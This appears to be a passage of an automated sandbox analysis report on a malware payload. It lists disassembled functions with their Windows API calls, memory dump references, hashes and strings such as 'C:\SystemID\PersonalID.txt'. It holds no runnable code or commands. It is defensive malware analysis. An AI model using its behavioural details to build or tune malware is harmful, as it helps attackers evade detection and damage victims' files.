                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00BAB1BA
                                                                                                                                                                          • Part of subcall function 00BA11C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00BA120F
                                                                                                                                                                          • Part of subcall function 00BA11C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00BA1228
                                                                                                                                                                          • Part of subcall function 00BA11C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA123D
                                                                                                                                                                          • Part of subcall function 00BA11C0: MoveFileW.KERNEL32(00000000,?), ref: 00BA1277
                                                                                                                                                                          • Part of subcall function 00BABA10: LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                          • Part of subcall function 00BABA10: RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                          • Part of subcall function 00BABA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BAB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00BAB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        • Opcode ID: 137af757ebfd21479e3bc108f7e67ee52ea62eca96d9dc4cf170cb8d9aa0ed42
                                                                                                                                                                        • Instruction ID: e871252bbdca91608a7e02f4d3baa8cf1ff106c30dad0d15fc702a6ed6aefb5e
                                                                                                                                                                        • Opcode Fuzzy Hash: 137af757ebfd21479e3bc108f7e67ee52ea62eca96d9dc4cf170cb8d9aa0ed42
                                                                                                                                                                        • Instruction Fuzzy Hash: E851E37151C3449BC718FB74C866AEEB7E8BF96344F4049ADF49643162EF309A09CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        • Opcode ID: 4d8e60baf3f931dd73ab9f8d3e8486bbb4dba0becaa3059cb9d4123506691675
                                                                                                                                                                        • Instruction ID: 6e6b1451aefaedc85b797c333aa41b5d1618fd42510aef7ff4e25ed6207e1ef0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d8e60baf3f931dd73ab9f8d3e8486bbb4dba0becaa3059cb9d4123506691675
                                                                                                                                                                        • Instruction Fuzzy Hash: B011E072D003059BDF31EF68DC467AE7BE0EF10318F1006B9EC5A56191E3B69A248BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB3B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BB3B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BB3B97
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3074076210-0
                                                                                                                                                                        • Opcode ID: 2bc95b4c469271091b3fb7e5239be8cace69adafee6b6fd238f5bab2a9b3c300
                                                                                                                                                                        • Instruction ID: e226e3c382dc82a2cbd73ac92b9c58fdeb116de7ba92421f2999d215289a2643
                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc95b4c469271091b3fb7e5239be8cace69adafee6b6fd238f5bab2a9b3c300
                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0D17540020DA7CF14BA98DC56EFEBBE8DB00751F0044A9FC5496182DFF09A8482D4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA3A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA3B0A
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 657562460-3788999226
                                                                                                                                                                        • Opcode ID: 957c0edda29036527f5c3689eb1bceb9a35c09b1df98f9ba4227239110a6cab8
                                                                                                                                                                        • Instruction ID: c2efeff570e1dc674123b409b4624610b4c8742d0ca99a071af8d1722a5cebe9
                                                                                                                                                                        • Opcode Fuzzy Hash: 957c0edda29036527f5c3689eb1bceb9a35c09b1df98f9ba4227239110a6cab8
                                                                                                                                                                        • Instruction Fuzzy Hash: FE01D472100B06ABD7208F9CC49169AF7E9EF81B24F20853EFA5587740F7B1E944C790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE4C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE4AE0: GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                          • Part of subcall function 00BE4AE0: GetFileType.KERNEL32(00000000), ref: 00BE4B05
                                                                                                                                                                          • Part of subcall function 00BE4AE0: __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                        • _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                          • Part of subcall function 00BBA12E: __getptd_noexit.LIBCMT ref: 00BBA16B
                                                                                                                                                                          • Part of subcall function 00BB7CEC: _doexit.LIBCMT ref: 00BB7CF6
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00BE4C0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                                                                                        • Opcode ID: 1e8e5b8989cc7102df7a9596ed854b2057d8a26030c4c3f155b4546bcb6db91b
                                                                                                                                                                        • Instruction ID: 7176cdfb481cbf6daffd2a0df2d1cd19ca50027f795d2d5eb8b00e9b77c986e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e8e5b8989cc7102df7a9596ed854b2057d8a26030c4c3f155b4546bcb6db91b
                                                                                                                                                                        • Instruction Fuzzy Hash: C1D09E795886007FD9016794AD07A6E7B91AF84714F408868F69A140A2DBB29520AA57
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2799698630-0
                                                                                                                                                                        • Opcode ID: 83043c3accdbdfd0e544b2ef3e49d8039d793426b50ff25c5fd6b42550566f30
                                                                                                                                                                        • Instruction ID: 8ce4c6e99a40d6d9bbdebec06af60741e2184140478b1e438ab82c652d12a3e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 83043c3accdbdfd0e544b2ef3e49d8039d793426b50ff25c5fd6b42550566f30
                                                                                                                                                                        • Instruction Fuzzy Hash: 815159719142598AEF20EF60CC457EEB6F6FF21318F1041F9D409A6251EB769A84CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB3A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __lock_file.LIBCMT ref: 00BB3A7D
                                                                                                                                                                          • Part of subcall function 00BB0E53: __lock.LIBCMT ref: 00BB0E76
                                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00BB3A88
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                                        • Opcode ID: 03672ffc58032528241e545efffb98c81969decb65c99e8810b0519ed4854f34
                                                                                                                                                                        • Instruction ID: cecc3c6b9f288efb7b5735e72223b5473dda6b92cfe60c9609d9bf5b22759e1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 03672ffc58032528241e545efffb98c81969decb65c99e8810b0519ed4854f34
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F09031811704ABD720BFA988027FE6AD46F00B34F2582C8E4A4AA1C1CBFCDB419B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BBFB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BBFB7B
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00000000,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • __tzset_nolock.LIBCMT ref: 00BBFB8E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __lock.LIBCMT ref: 00BBFE6C
                                                                                                                                                                          • Part of subcall function 00BBFE47: ____lc_codepage_func.LIBCMT ref: 00BBFEB3
                                                                                                                                                                          • Part of subcall function 00BBFE47: __getenv_helper_nolock.LIBCMT ref: 00BBFED4
                                                                                                                                                                          • Part of subcall function 00BBFE47: _free.LIBCMT ref: 00BBFF07
                                                                                                                                                                          • Part of subcall function 00BBFE47: _strlen.LIBCMT ref: 00BBFF0E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __malloc_crt.LIBCMT ref: 00BBFF15
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1282695788-0
                                                                                                                                                                        • Opcode ID: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction ID: 8a9fabcec1916f787aff6dc2599c69cca565b5e7f89d4f9a4c6bdde87e30f2c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction Fuzzy Hash: 28E0EC35451246DBEB30ABB0DD1A7FC72E4EB1132AF1591A5E420161D28FF84584CA22
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00BB7B11
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00BB7B16,00000000,?,00BB8BCA,000000FF,0000001E,00C97BD0,00000008,00BB8B0E,00000000,00000000), ref: 00BB7AE6
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00BB7AF8
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BB7B1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                        • Opcode ID: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction ID: 4c59a99a3446a3d892a3082827e374ae6e760a9b83a1f8fd2dd34cab06dd8937
                                                                                                                                                                        • Opcode Fuzzy Hash: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction Fuzzy Hash: 75B09230005208BFCB052F51DC0A9AD3F69EB40391F008020F91808032EFB2AA919AC0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA18C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA18DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00BA18E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
